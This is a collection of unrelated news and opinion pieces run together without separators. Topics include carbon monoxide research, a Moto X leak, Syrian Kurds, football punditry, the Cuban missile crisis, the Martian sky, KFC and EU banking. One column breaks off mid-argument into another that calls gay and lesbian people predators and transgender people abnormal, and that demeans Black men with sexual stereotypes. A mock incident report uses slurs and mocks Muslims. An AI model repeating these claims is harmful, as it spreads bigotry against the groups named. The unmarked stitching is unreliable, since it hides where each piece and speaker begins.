Image caption Traffic is a common source of carbon monoxide
The way that even low levels of carbon monoxide can be fatal , by disrupting the heart 's rhythm , has been unravelled by researchers in Leeds .
They found that levels common in heavy traffic could affect the way the heart resets itself after every beat .
Their study in the American Journal of Respiratory and Critical Care Medicine showed a common angina drug may reverse the effect .
The British Heart Foundation said the research was a promising start .
Carbon monoxide is produced by faulty boilers , cigarettes and car exhausts .
It is deadly at high levels as it `` shoulder-barges '' oxygen out of the blood , meaning less is transported around the body . Carbon monoxide poisoning kills more than 50 people in the UK each year and many more around the world .
However , studies have suggested that even low levels , such as that found in built-up cities with lots of traffic , may also damage the heart .
Symptoms of carbon monoxide poisoning Headaches
Breathlessness
Nausea
Dizziness
Collapse
Loss of consciousness
Tiredness
Vomiting Source : Health and Safety Executive Find out more from the NHS website
The University of Leeds research team found that the gas kept sodium channels , which are important for controlling the heartbeat , open for longer .
Disrupting the sodium channels can disrupt the heart 's rhythm , leading to cardiac arrhythmia , which can be fatal .
Solution
In collaboration with researchers in France they tested an angina drug - which also affects the sodium channels - on rats .
Prof Chris Peers , from the University of Leeds , told the BBC : `` It was very exciting for us . When we monitored rats exposed to levels of carbon monoxide similar to heavy pollution , they had the same heart problems and we could reverse them .
`` At the moment no one knows how to treat this . We 're saying look there 's a drug on the shelf that might be able to help .
`` Of course it needs clinical trials , but we believe it is a great start . ''
Dr Helene Wilson , a research advisor at the British Heart Foundation , said : `` This study is a good example of research being used to better understand the underlying causes of an abnormal heart rhythm and in this case it has uncovered the ability of an old drug to perform a new trick .
`` Carbon monoxide poisoning is tragically common but hopefully these promising results can be replicated in people so that it saves lives in the future . ''
Share
Check out our full review of the Motorola Moto X smart phone .
Google and Motorola have been doing fairly well keeping a lid on Moto X-related information , with the companies behind the new device seeking to build momentum prior to its imminent launch .
However , a leaked video – apparently the work of Canadian wireless carrier Rogers – has helpfully divulged a few more details about the device . It seems that the high-end handset will incorporate a voice command feature that 's fired up and ready to go 24/7 . No button-pressing to get it started , no swipes or taps to initiate it ; it 's always on , always listening , and always ready to respond .
How this might work out in an elevator choc full of Moto X owners is anybody 's guess , but presumably it could get rather noisy if all the phones kick off together when someone asks about the weather . OK , it 's possibly a scenario too far , but hey , if the phone turns out to be a big hit , you never know .
The video ( below ) , brought to our attention by Australian site Ausdroid , explains that “ without touching it at all , you can get directions , set an alarm , or do nearly anything , just by talking. ” We 'll have to wait to see if Google includes this always-on functionality in its next version of Android , or whether it keeps it as a Moto-X-only feature .
Active updates will also be part of the device . “ Instead of a blinking light that does n't actually tell you anything , information quietly appears on the screen , ” the video explains .
Easy camera
The new handset will also feature a quick-launch camera , with a simple double shake all that 's required to get it ready . Taking a shot is simple enough too – just tap lightly anywhere on the screen and you 're done ( or keep it pressed for burst mode ) , useful for snappers who can never quite get their digit around to the awkwardly placed shutter button without jogging the camera at the vital moment .
The video rather oddly makes no mention of the handset 's much-talked-about customization options where you can choose a color for the front and back – Rogers says its Moto X will be available only in black and white .
Google has reportedly set aside up to half a billion dollars to market the Moto X , a clear indication of how badly the company wants this device – the first from Motorola since the mobile maker was acquired by Google last year – to succeed when it comes to market .
Talking of coming to market , the video also states the Moto X will launch in Canada in August , and will be sold exclusively in the country by Rogers . No US launch date has been officially announced yet , but if it 's coming to Canada in August , we can expect to see it at the same time or before in the US – in other words , sooner than the fall date that 's been doing the rounds recently .
RACISM CARD LOOKING A LITTLE DOG-EARED
Do liberals have any arguments for their idiotic ideas besides calling their opponents `` racist '' ?
The two big public policies under attack by the left this week are `` stop-and-frisk '' policing and voter ID laws . Democrats denounce both policies as racist . I 'm beginning to suspect they 're getting lazy in their arguments .
Stop-and-frisk was a crucial part of the package of law enforcement measures implemented by New York Mayor Rudy Giuliani that saved the city . Under David Dinkins , who preceded Giuliani , murders averaged about 2,000 a year . There were 714 murders in New York the year Giuliani left office . Continuing Giuliani 's policing techniques , Mayor Michael Bloomberg 's New York had only 419 murders last year .
Just during his first year in office , Giuliani 's policies cut the murder rate an astonishing 20 percent . That first year of his administration was responsible for 35 percent of the crime drop nationwide from 1993 to 1995 . The New York Times hailed this remarkable achievement with an article headlined , `` New York City Crime Falls but Just Why Is a Mystery . ''
It was mostly black lives that were saved by Giuliani 's crime policies . By the end of his administration , the Rev . Calvin Butts , liberal pastor of Harlem 's Abyssinian Baptist Church , was comparing Giuliani to King Josiah of the Bible , who `` brought order , peace , the law back to the land . '' The black minister told The New York Times , `` I really think that without Giuliani , we would have been overrun . ''
About the same time as the Rev . Butts was comparing Giuliani to King Josiah , Richard Goldstein of The Village Voice claimed he felt less safe in New York under Giuliani . It was the ravings of a madman , like saying winter is warmer than summer . But now , Goldstein 's ideas are being delivered from the federal bench by Judge Shira Scheindlin , who recently held New York City 's stop-and-frisk policies unconstitutional .
In America , it used to be that boys were boys and girls were girls , except for a handful of boys and girls who did n't conform to the norm . Boys were at the top of the heap ; girls had a carefully carved out , limited sphere of influence and opportunities ; and sexually non-conforming people were ignored or abused , depending on both their ability to blend in and their community 's ability to cope with their differences . Both women and sexually non-conforming people were routinely denied equal treatment under the law .
The women 's lib and gay rights movements were originally sold as a way to ensure that women and gays ( and , eventually , the whole LGBTQ spectrum ) received equal treatment under the law . That was originally understood to mean equal access to education , employment opportunities , and house ; equal pay for equal work ; and freedom from overt , violent discriminatory practices — and that was it .
Since then , equal treatment under the law has become a picayune , limited goal . Instead , the Left is using gender and sexuality as a way to remake society entirely in opposition to heterosexual males , the ones who created Western society in the first place .
The latest push to remake society is the effort either to ban the word “ bossy ” or to turn it into an undiluted positive when the word is applied to girls . This , of course , ignores the reality of bossy little girls .
Girls are bossy , something that comes about because they model themselves on their mothers . Despite decades of Leftist marriage , gender , and sexuality rejiggering , for most children , Mom is the Big Boss in the house . ( Indeed , considering the soaring number of single moms , she 's the only boss in the house . ) The vast majority of little girls identify with mommy . That 's a fact that no gender theory will ever change . So if Mommy is bossy — as she has to be in order to run a household with children — then a little girl 's logical assumption is that , to be a grown woman in training , she too must be bossy .
And what about the claim that we 're all wrong to say it 's obnoxious when girls are bossy ? I could n't disagree more . It 's incredibly obnoxious when girls are bossy . What 's appropriate coming from a grown woman with responsibilities is profoundly irritating whether a 4-year-old lisps orders to her friends , a 10-year-old hollers imprecations at her brother , her a 15-year-old , in a strident whine , tells her parents what she wants them to do . It 's obnoxious not because the 4 , 10 , and 15-year-old are female , but because they have n't yet earned the right to boss anyone around . The issue is age , not sex .
Even as the Leftist/Progressive/Democrat establishment seeks to make it so that every girl 's fecal matter is perceived as perfumed , the relentless attacks on boys never end . Fortunately for me ( 'cause I 'm lazy ) , I do n't have to go into detail on this topic because Matt Walsh has already done so , saying what I would say , only doing it better .
So let me just skip ahead to a discussion of the Left 's latest attack on America 's last bastion of masculinity : the military . The military used to be the place where you sent your boys to become men . Now ? I do n't know . The military is still overwhelmingly male , but the Obama administration , even though it can not change the numbers , is doing its best to change its manly ethos .
Gays can openly serve now , which puts a great deal of pressure on young men . While the Left will freely acknowledge that women should n't have to shower with men who view them in a sexually predatory fashion , and that women in the military are at risk of becoming victims of violent sexual attacks from predatory men , the Left refuses to acknowledge that gay men can be equally predatory to other men . ( And lesbian women are often predators to other women . ) Under the new paradigm , shying away from showering with an aggressive gay man or lesbian woman is n't logical self-preservation and respect for ones own sexual integrity ; it is , instead , homophobic and the people holding such views must be re-educated and/or destroyed . It 's an interesting social experiment , but a disastrous burden to place on an institution that has as its primary task combat training and preparation to fight off enemies of unspeakable savagery .
Placing women in combat is also a de-masculinizing effort ( yes , it 's a neologism ) on the Obama administration 's part . Training standards will have to be lowered because it 's the extraordinarily rare woman who can compete head-on physically with men . Men are bigger and stronger . They have stronger bones and joints . Their skin is tougher and has fewer nerves , meaning it 's less sensitive to pain . They get less breathless . They can pee standing up or into old water bottles , and they do n't have periods or get pregnant . They are vulnerable to rape ( see the above paragraph ) , but less vulnerable , especially because cultures other than America subscribe to the Red Army 's approach to despoiling conquered women .
The only way women can compete equally with men is to lower the standards for men . This means that young men will not be challenging themselves as much . To the extent many join the military because men need challenges , the military becomes less attractive . Additionally , young men are n't fools . They know that women will create physical and emotional drags on a combat unit . Only in the Ivory Tower , surrounded by theory , would people think that women with their different biology are identical to men for all purposes , including combat .
Having turned the military into a Progressive experiment for gays and women , now what do we do ? We bring transsexuals into the military . Although the number of transsexuals in the military will of necessity be small ( there are n't that many around ) , I suspect the transsexual-infused military will be a different animal from what it currently is . Libby , one of my wonderful commenters , found this interesting tidbit about transsexuals :
The American Foundation for Suicide Prevention report on suicide attempts among transgender and non-gender conforming adults ( Jan.2014 ) found that the while rate for suicide attempts in the general US adult population is about 4.6 % , in transgender people , the rate is 41 % ( 46 % for trans men ) .
transsexuals are deeply , deeply unhappy people , who wear their own bodies like a painfully ill-fitting outfit . I feel nothing but compassion for their anguish ( an anguish that gender reassignment may do nothing to help ) . Having said that , I am appalled that our president somehow thinks that the military will be the group therapy environment these troubled souls need . He is using America 's front line defense against a dangerous world to normalize that which , statistically and biologically speaking , is n't normal . *
There is nothing closer to who and what we are than are gender and sexual orientation . A wise friend of mine thinks that Islam 's entire beef with the Western world is the fact that , as Westernism creeps into Muslim communities , women fight to leave the harem , the burqa , and the hijab . All other insults to the religion are tolerable , except for the one that shakes up the relative values between men and women under Islam .
The Left understands this , but it heads in an opposite direction from Islam . Rather than attacking women and gays to gain control over culture , it attacks heterosexual males . This is why , beginning when they 're just little children , America 's males are systematically demeaned and insulted . They are also deprived of opportunities to express their masculinity in positive ways and , instead , are reduced to expressing it through computer games , random violence , and perpetual dorm-style sloth and slobbery . If you want to see the end of a sustained Leftist attack on men , you need only look to the American black community , where men have been rendered useless . The government fulfills all the functions women need ( shelter , food , health care , and child care ) , leaving the men responsible only for spread sperm . No wonder , then , that black men have developed a culture focused on the size of their weapons ( both of which , ironically , are tucked in the pants ) : guns and penises .
_____________________________
* No , I 'm not saying people on the LGBTQ spectrum are “ perverts ” or “ sickos , ” or that they should be ridiculed , humiliated , discriminated against , hanged , beaten , imprisoned , or anything else . I do n't believe that .
What I do believe is that love and physical desire are a combination of mind , biology , and culture , and that , when it comes to consensual adult relationships , it 's my business to stay out of it . When I look at people , I judge them on values other than their sex partners , values such as individual freedom versus government control , stable relationships versus promiscuity , hard work versus parasitism , kindness versus cruelty , etc .. I do , however , reserve the right to look down upon people if their choice of sex partner is their only value .
So , rather than sit in judgment on LGBTQs , what I 'm trying to say is that non-heterosexual orientations are statistical anomalies and that it is impossible to build a culture around a biological statistical anomaly . It wo n't stick .
Share this : Email
Facebook
Twitter
Ryan Giggs will join Gary Neville and Jamie Carragher on a special edition of Monday Night Football as Liverpool host Manchester United .
Giggs proved a controversial figure during ITV 's coverage of Slovenia vs England when he criticised Daniel Sturridge and he will be expected to add to the spice of Neville and Sportsmail columnist Carragher .
The Welshman will be a special guest as Sky 's flagship football programme returns live from a football stadium for the first time in eight years .
Ryan Giggs will appear as a special guest on Monday Night Football next week
He becomes the second high-profile guest to be invited on to the programme fronted by David Jones in a matter of weeks after Reds boss Jurgen Klopp appeared during coverage of Burnley vs Watford last month .
The 42-year-old former winger has made a number of TV appearances since he left his role as an assistant manager at United in July .
On Tuesday , as England drew 0-0 against Slovenia , Giggs turned on Reds striker Sturridge , who failed to impress in Ljubljana .
Daniel Sturridge ( right ) reacts to missing a chance during England 's 0-0 draw with Slovenia
Giggs suggested that Sturridge needs to make better decisions to become a 'top , top player '
Giggs suggested that had the striker , who will line up against United , been more dynamic in attack England may have left the Stozice Stadium with more than just a point .
' I played with Sturridge at the Olympics [ in 2012 for Great Britain ] , ' the former Manchester United winger told ITV Sport in his role as a pundit .
'He has everything . He 's got a good touch , good finisher , he 's quick , he can run the channels but to be a top , top player ... decision-making .
'You have to make the right decisions . You have to make the right decisions more often than you make bad decisions . Today there were just too many bad decisions . '
ANKARA ( Reuters ) - A Syrian Kurdish party with links to Kurdish militants in Turkey have seized control of a Syrian border town after days of clashes with Islamist fighters , the Turkish military said .
The capture of Ras al-Ain on Syria 's northeastern border with Turkey by the Democratic Union Party ( PYD ) will heighten Ankara 's fears that the emergence of an autonomous Kurdish region in Syria could embolden homegrown militants of the Kurdistan Workers ' Party ( PKK ) , which is fighting for autonomy in Turkey .
Turkey 's foreign minister voiced concern at the spillover of violence from the war in its southern neighbor and called again on the United Nations Security Council , which has yet to come to a consensus over Syria , to act .
In a statement late on Wednesday , the military said Ras al-Ain had fallen under the control of the PYD , which it described as a “ separatist terrorist organization ” . Fighting in the town had now stopped .
Turkish troops had shot at PYD fighters in Syria in accordance with its rules of engagement after two rockets propelled grenades fired from Syria struck a border post on the Turkish side of the frontier .
The return fire was the second time in as many days the military has answered in kind after several stray bullets from Syria struck the police headquarters and several homes in the adjacent Turkish town of Ceylanpinar on Tuesday .
Two Turkish citizens , including a 15-year-old boy , were killed by stray bullets in what was the most serious spillover of violence into Turkey from Syria in weeks .
The military said it had now strengthened security along that part of the border with armored vehicles .
The clashes between Kurdish fighters , who generally support the creation of an autonomous region within Syria , and Islamist Arab fighters from the al Qaeda-linked Nusra Front started on Tuesday after Nusra fighters attacked a Kurdish patrol , according to an anti-government Syrian activist group .
Clashes between Kurds affiliated with the PYD , and Syrian and foreign fighters opposed to Syrian President Bashar al-Assad , have erupted since Kurds began asserting control over parts of the northeast from late last year .
TURKEY CONCERNED
Turkey , with its own large Kurdish minority , has been watching closely , concerned a Kurdish power grab to the south could strengthen PKK militants in Turkey with whom they have embarked on a peace process .
Developments in Syria could threaten that process , which is already under pressure amid an increase in militant activity in Turkey seen as fuelled by frustration at Ankara 's perceived lack of progress on pushing through related reforms .
Turkey 's main pro-Kurdish party , the BDP , on Wednesday criticized Ankara over its Syria policy and said it worked contrary to peace efforts with Turkey 's Kurds .
Speaking in Ankara on Wednesday , Foreign Minister Ahmet Davutoglu expressed concern over the events along the border .
“ This illustrates a striking picture of how much the crisis in Syria can affect us and our citizens , ” state-run broadcaster TRT quoted Davutoglu as saying .
“ Once again we call upon the international community ... if the U.N. Security Council is to do the job it is required to do , then the moment is now , ” he said .
Turkey , which has emerged as one of Assad 's most vocal critics and biggest backers of the rebels fighting to overthrow him , has hit out previously at the U.N. Security Council for failing to adopt a united stance on Syria .
Prime Minister Tayyip Erdoğan was expected to meet President Abdullah Gul and the military 's Chief of General Staff Necdet Ozel on Thursday and the latest developments in Syria were likely to feature high on the agenda .
Turkey , which has the second-largest army in NATO , is reluctant to act unilaterally in Syria although it has scrambled war planes along the border as gunfire and shelling hit its soil . Turkey hosts around 500,000 Syrian refugees .
I have been living in Philadelphia for 9 years now , and while I can tell a Philly accent when I hear one , I can not , for the life of me , figure out how to do it myself . Something about the vowel system gets me all tripped up , and I end up sounding like cockney Tony Soprano .
Part of the problem is that there are n't any well-known popular culture characters to imitate . You know , if you want to do Minnesota , you channel Fargo . To do Boston , you put on a little Good Will Hunting . But who do you imitate to “ do ” Philadelphia ? The accent rarely shows up in movies or TV , even when they are explicitly set in Philadelphia , as this New York Times article points out .
I 've gotten a little better at the accent , or at least at understanding why Philadelphians sound the way they do , from watching Sean Monahan 's PhillyTawk YouTube videos . They 're fun and entertaining , but they also break down the linguistic concepts behind the accent in an accessible way . Here 's the explanation of the split short-A system . It helped me realize that to pass for a Philly native I will need to work on mastering the sentence “ halve the hoagie , then have half . ”
And while I knew about that old shibboleth where the Eagles become the “ Iggles , ” I never thought about how a Philadelphian would say “ Craig 's essay about the effect of the Black Plague on the medieval Hague was pretty vague . ”
If you 've been mystified by the Philly ( or South Jersey , or Baltimore ) accent , all the PhillyTawk videos will help . We 've all got to do what we can to keep up appreciation for this distinctive American dialect , at least until natives Bradley Cooper ( at 1:15 ) or Tina Fey ( at 3:40 ) bring it to the big screen .
A San Francisco State University professor apologized Monday evening for starting an e-mail rumor that federal geologists were predicting a 6.0 magnitude earthquake in Berkeley in the next two to three weeks .
The professor , Genie Stowers , who is chair of the Department of Public Administration at the university , originally sent an e-mail to family and friends about the purported quake prediction following a swarm of quakes centered in the hills above Berkeley .
The email said one of her students , who works as an assistant to a Berkeley 's City Council member , told her class that geologists were informing the council that the recent swarm of quakes indicated a bigger quake was coming .
After Stowers ' e-mail made the rounds , and after four earthquakes of magnitude 3.0 or greater hit the region since Oct. 20 , Berkeley 's deputy city manager and the director of the Berkeley firefighters ' Association sent out their own e-mails saying no such briefings had occurred and that anyway , geologists are not in the business of making earthquake predictions .
In an apology sent to Berkeley City Councilman Kriss Worthington on Monday , Stowers said she had only sent the e-mail to family , close friends and colleagues with a message that “ preparedness is good . ”
“ It is unfortunate that this email instead went viral and has caused great concern among many in the Berkeley area … It was a mistake and I regret that it happened . ”
Stowers said beyond her apology , she would make no further comments .
When contacted before Stowers issued her apology , Keith Knudsen , deputy director of the U.S. Geological Survey Earthquake Science Center in Menlo Park , said “ I do n't know of any scientific organization that would make a statement like that . We did n't . ”
Doug Oakley covers Berkeley . Contact him at 510-843-1408 . Follow him at Twitter.com/douglasoakley
Reporter is Victim Nationality United States Race White Gender male
Nature of Incident
Other
. My Muslim `` friends '' beat me up in school and insult my parents but they are cooler than my other friends who are just white liberals like me . They are so vanilla . Some of them do n't even have nose rings . Come to think of it neither do my Muslim `` friends '' but that 's probably just because their parents do n't let them . I think it 's cool that their families have traditional views like that . Fuck my parents for trying to tell me to pay for my own nose ring though , fucking oppression is what that is . I told my dad off right to his fucking boring white vanilla face . Anyway I do n't have a place to stay now so I 'm starting a petition / riot to protest Drumpf 's nazi tactics . If my dad was orange he 'd probably be Drumpf ( ROFLMAO ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ) but no he ca n't even be orange , he 's so fucking white . Only slightly non-white thing about him are those STUPID Irish freckles I hate my dad so much . Well my 15 min at the library PC is up , and I have to find a safe place to sleep today . I got mugged and beat up by some disenfranchised minorities yesterday who were probably just taking their aggression out on me for something that Drumpf did to them . I cried and called out pathetically to some Muslim passers-by for help but they said `` fuck you faggot you deserve it '' and they spat in my general direction , which I totally understand since I was basically violating their cultural no-go zones where white people ( even people who are transitioning from whiteness ) are not allowed . I was not aware that that particular alleyway had become part of their turf . I think I know a good place to hide though , I think there 's a manhole I can pry open not far from here . Once the sewer rats accept me as one of their own we will rise up and overthrow the nazis . Thanks for listening . Racially yours , Liberal ally .
By David Ignatius - October 7 , 2012
ISTANBUL -- Any presidential election is in part a referendum on the 3 a.m. question , namely : Who do you trust to answer the phone and make a wise decision if the red phone rings in the middle of the night with a nuclear crisis ?
The remaining weeks of this presidential campaign will focus more on the foreign-policy issues that will help Americans make the 3 a.m. decision . And it should help concentrate our minds that this month is the 50th anniversary of the most dangerous moment in modern American history , the Cuban missile crisis .
The surprising fact is that 50 years later , so many of the key questions about the crisis are unanswered -- and perhaps , unanswerable : Why did Soviet Premier Nikita Khrushchev secretly install nuclear missiles in Cuba ? Why did President John F. Kennedy and his brother Bobby resist the nearly universal advice of hawkish advisers to strike Cuba , despite their own decades of militant anti-Soviet rhetoric ? What would have happened if detailed news of the crisis had leaked , or if the Soviets had publicized JFK 's secret pledge to remove missiles from Turkey in exchange for Khrushchev 's public climb-down ?
You 'd think we would have answers for these riddles , given that the Cuban missile crisis is the best-studied national security crisis in history . We have taped deliberations of JFK 's famous `` ExComm , '' his inner circle of advisers ; and we also have documents from Soviet and Cuban archives , as well as interviews with participants on all sides . Yet the mysteries persist .
To prepare for this 50th anniversary , Graham Allison , whose famous book `` Essence of Decision '' makes him the dean of scholars of the crisis , recently hosted a conference of experts at the Harvard Kennedy School 's Belfer Center . These specialists continue to unearth new nuggets of information : Some Soviet ships may have turned around two days earlier than U.S. intelligence realized ; the shooting down of a U-2 spy plane that nearly triggered war was a Cuban decision , not Soviet ; as the ExComm planned an invasion of Cuba , the U.S. did n't realize the Soviets had tactical nuclear weapons there . It 's truly frightening how much was n't understood at the time .
As part of its 50th anniversary work , the Belfer Center is sponsoring a contest for students to come up with their own lessons for the crisis . ( Go to cubanmissilecrisis.org for details . ) But even in the lessons-learned category , where you 'd think there would be clarity , the views are sharply divergent .
Harvard researchers have catalogued lessons learned by different U.S. presidents from the 1962 confrontation . The presidents tend to see the lessons in their own image , reinforcing their own policy preferences : JFK saw the benefits of secret diplomacy and the futility of nuclear war , but his successor , Lyndon Johnson ( who had clamored for military action ) , saw the lesson as American firmness , and believed Vietnam posed the same challenge as Cuba . Richard Nixon thought the key was nimble presidential leadership ; Jimmy Carter saw the need to engage adversaries . George W. Bush oddly cited Kennedy 's cautious decisions as a rationale for pre-emptive military attack .
The advisers of 1962 brooded over the meaning of the missile crisis for the rest of their lives . Soviet Ambassador to Washington Anatoly Dobrynin thought Khrushchev 's fatal mistake was that he failed to publicize the secret Cuba-Turkey missile swap he had helped negotiate . Attorney General Robert F. Kennedy , the once inflexible Red-baiter who helped his brother find an escape route from confrontation , realized one must never humiliate an adversary . Robert S. McNamara , the defense secretary , would conclude , `` At the end , we lucked out . ''
Which brings us back to the candidates of today . How would they handle a crisis of this gravity and unpredictability ? Barack Obama has stressed the importance of Kennedy 's `` calm , rational judgment '' and his `` courage ... to talk to our enemies . '' I have n't found direct comments from Mitt Romney , but we can infer from other policy statements that he would likely agree with his friend Israeli Prime Minister Benjamin Netanyahu that the crisis showed the importance of setting `` red lines '' and backing them with force .
In thinking about these two candidates , we need to imagine them in the cauldron of October 1962 . Do they have the resolution to take the nation to the brink of war to deter an adversary ? Do they have the creativity and humility to see events through their adversaries ' eyes , and find a path to peace ? Which one would you trust at 3 a.m. ?
Sky Sports sources understand Tottenham Hotspur could finalise the appointment of the club 's new manager in the next 24 hours .
Former Chelsea boss Andre Villas-Boas is the overwhelming favourite to take charge at White Hart Lane after Harry Redknapp left his position last month .
Villas-Boas had endured a difficult first season in the Premier League after joining Chelsea from Porto 12 months ago , and he was sacked by the eventual UEFA Champions League winners in March .
However , the Portuguese looks set to be given a second chance to build on the reputation he had established at Porto by taking over at Tottenham .
Reports had suggested that Villas-Boas could have been installed over the weekend , but an announcement could now be made by Tuesday .
The likes of Laurent Blanc , Ralf Rangnick and Didier Deschamps had also been linked with the vacancy , but reports suggest Spurs have settled on Villas-Boas as their No.1 choice .
Variety of daytime skies . The moon 's sky is black because it has no atmosphere . The earth normally has a blue or a gray sky , depending on cloud cover . On earth , windstorms sometimes swirl dust into the air , making the sky a hazy tan . Similarly , Mars ' atmosphere always contains a lot of dust , and its sky is permanently tan .
Mars may not be made of green cheese , but its sky looks like butterscotch ....
What about the Martian sky ?
On Mars , photographs from landing vehicles ( the Viking from 1976-78 and the Pathfinder in 1997 ) suggested that the sky is generally a butterscotch ( yellowish-brown ) color . Mars appears to have a permanent haze of dust , which remains suspended in the air after dust storms . The dust contains the mineral limonite , a brown iron oxide found on most of the Martian surface . Sky color measurements from Viking Lander 1 have been used with computer simulations of light scattering to estimate that the dust particles contained about 1 % by volume of another iron oxide mineral known as magnetite ( a black , opaque material ) .
The sky is not blue as on Earth because Martian air is extremely thin , and the dust particles in the air are large relative to the wavelength of visible light . The dust particles preferentially absorb blue light and effectively act as mirrors by scattering the remaining wavelengths : this produces the butterscotch color of the atmosphere .
We know the color of the Martian daytime sky from properly color-balanced pictures taken by the Viking landers in 1976 and Mars Pathfinder in 1997 . The first Viking lander images broadcast over TV in the 1970s showed a blue sky , later `` corrected '' to a pink sky . In addition to uncertainties in the initial image processing , the lander had several color patches to calibrate the cameras , which were partially covered with Martian dust thrown up during landing . However , further analysis of Viking lander data revealed a Martian sky that is generally butterscotch in color , except for the pink or red of sunset and sunrise . In 1997 , the Mars Pathfinder confirmed this finding .
Measurements taken by the two Viking lander spacecraft demonstrated that the Martian atmosphere always had some fine dust suspended in it . The dust particles vary in size , from smaller than visible light wavelengths ( which range from approximately 0.4 to 0.7 µm ) to as large as several tens of µm . Therefore , scattering ( including absorption ) of sunlight by the dust particles in the Martian atmosphere accounts for the sky 's color .
Because the dust particles both absorb and reflect sunlight , and because large particles lead to more uniform scattering among different wavelengths , Rayleigh scattering can not completely explain the sky 's color . If the dust did not absorb any sunlight , the Martian sky would appear whitish , since all wavelengths would be scattered equally , just as clouds scatter sunlight . The atmospheric dust that provides the butterscotch tint to the Martian sky also produces the characteristic red color of Mars seen by the naked eye .
While Rayleigh scattering has a very small effect in the Martian atmosphere , at certain times and in certain places , clouds of extremely small dust particles give a blue cast to images taken from overhead . These are the so-called `` blue hazes '' observed in some cratered regions and parts of the Valles Marineris .
If the Martian atmosphere were free of dust , the daytime sky would appear blue , because of Rayleigh scattering by the molecules ( primarily carbon dioxide ) that make up the atmosphere . Because the atmosphere is thinner than earth 's atmosphere , the Martian sky would be a darker blue than ours , much as the sky on earth appears at high altitudes with a similar density of air molecules . It is possible ( though unlikely ) that future missions to Mars will find a different sky color .
KFC has long been known for thinking outside the box . After all , how else can one explain the ingenuity behind items like fried chicken pizza and the iconic — and heart attack inducing — Double Down Dog .
But KFC is pushing things even farther , only this time it 's tapping into the world of technology . In celebration of the chain 's 60th year in Canada , KFC put some of its best research scientists to work . After days spent holed up in a lab , running on little to no sleep , they finally emerged with a product that seamlessly blends cutting edge technology with their amazing chicken .
Behold , the Memories Bucket .
DO N'T MISS : 10 hidden tricks that could completely change the way you use your iPhone
Apparently , all one has to do is link up their smartphone with a KFC Memories Bucket whereupon it 'll quickly print up a photo of your choosing .
While there 's no word if this crafty little creation will ever be available for mainstream use , it sure represents an interesting if not peculiar way to celebrate 60 years of chicken .
Lastly , it 's worth pointing out that both KFC and Pizza Hut are owned by the same company — Yum ! Brands . Why is this relevant , you might wonder ? Well it was n't all that long ago that Pizza Hut introduced us to a pizza box capable of turning into a movie projector .
So at long last , the dream of living in a world where our TVs are replaced by pizza boxes and our printers are replaced by buckets of chicken has become a reality .
It 's a marvelous time to be alive .
And now the pressure is on Taco Bell , yet another Yum ! Brands-owned company , to step up to the plate with a wild invention all their own .
Democratic Senate Majority Leader Harry Reid told Republican Sen. Tom Coburn Tuesday that his point about how few Obamacare plans are accepted at top cancer hospitals is “ in the weeds . ”
“ Nineteen of the cancer centers in this country , only five are covered under Obamacare , ” Coburn told The Washington Examiner .
“ Dr . Coburn is very good at getting into the weeds and trying to find something that he thinks makes sense , but I think we need to look at the overall context of this bill , ” Reid said at a Thursday Senate press briefing . “ It really brings a lot of people in from the cold so that they have the ability to get health insurance , which they 've never had the opportunity [ to do ] before . ”
Coburn is raising an issue that is playing out in top research hospitals around the country . “ You know , it 's a market , and what they 've done is they 've priced it where these cancer centers , a lot of them , are n't going to participate because they do n't get paid to cover the costs , ” he said .
The nation 's top multi-campus cancer hospital The Mayo Clinic , which was cited by President Obama as a health reform model for the nation when promoting the law in 2009 , now accepts only one kind of Obamacare insurance plan : the Blue Cross Blue Shield silver plan .
The Cleveland Clinic , a top-four U.S. hospital , is making $ 330 million in budget cuts this year , including more than $ 100 million in cuts that the hospital claimed was directly due to Obamacare , and projects a workforce reduction .
Ohio Republican Gov . John Kasich spoke at the Cleveland Clinic late last year to present his plan to accept a full Medicaid expansion package under Obamacare . The health law raises federal Medicaid eligibility to 138 percent of the poverty level .
The federal government 's Medicaid reimbursements to hospitals are seen as a way for hospital interests to get a portion of their money back — prompting the hospital lobby to push hard with an effective multi-state pro-Medicaid campaign .
Follow Patrick on Twitter
THE NEW political season in Brussels opened with a row between Germany and the EU Commission over Europe 's proposed banking union , an initiative central to this State 's campaign for debt relief .
After a relatively calm holiday period , EU leaders are confronted with a host of knotty challenges this autumn as Greece struggles to maintain its place in the euro zone and Spain tries to avert a full-blown sovereign bailout .
The immediate focus is on a key European Central Bank meeting on Thursday at which the bank is expected to set out a plan to intervene in bond markets , which Germany 's Bundesbank is resisting .
Although Europe 's leaders have pledged to review the rescue of the Republic 's banks next month , any reduction in the debt load will be contingent on the establishment of a European bank supervisor .
Amid ongoing talks between Irish and European officials , a formal debt relief proposal from the commission is still awaited .
Economics commissioner Olli Rehn has said the commission will produce its plan this month in anticipation of a deal in October .
It is unclear whether any proposal will be put before a meeting of finance ministers next week in Cyprus . For the moment at least , no decision on the Republic is expected at that gathering . The Government believes a deal this autumn , even if it was to be implemented later , would still improve our standing with private debt investors .
At the same time , deepening divisions between Germany and the commission over the scope of the supervisor 's work suggests an agreement on that front will be difficult to reach . EU leaders have agreed that the ECB will carry out the supervisor 's work but Germany and the commission are far apart over how many banks it will oversee .
While Germany insists it should apply to only the largest systemic banks , the commission wants all 6,000 banks in the euro zone to come within its ambit .
In an address last night to MEPs in Brussels , Mr Rehn pointed to the example of Anglo Irish Bank when saying the new supervisor should be empowered to minimise systemic risk from supposedly minor institutions .
“ As we have seen in recent years , even small banks can be systemic and cause financial turmoil ( Northern Rock , Anglo Irish , Bankia ) , ” he told a European Parliament committee . “ Our approach , therefore , envisages an ambitious mechanism with a relatively broad coverage , which will oversee all banks in the euro area , with the ECB at the heart of the system . ”
This stance , backed by the wider commission , is at odds with the German view that it is neither feasible nor practical to tackle thousands of banks at once .
Critics in Brussels say Germany 's position is grounded in concern about maintaining local supervision of its network of state-owned Landesbanks , something that would give Berlin greater discretion over their affairs .
However , German finance minister Wolfgang Schäuble said yesterday that the government 's position mirrored that of the central bank .
“ The ECB has itself said it does not have the potential to supervise the EU 's 6,000 banks in the foreseeable future , ” he said .
While the leaders say the new system must be up and running before they allow Europe 's bailout funds to directly recapitalise banks , Mr Schäuble questioned the commission 's ability to finalise its plan by the end of the year . “ I have doubts that this can come so fast , ” he said .
Still , he was more optimistic about the prospects for a plan dealing with the largest banks . “ With the bigger , systemically relevant banks . . . there is a chance that direct supervision by the ECB could be realised in a foreseeable period of time . ”
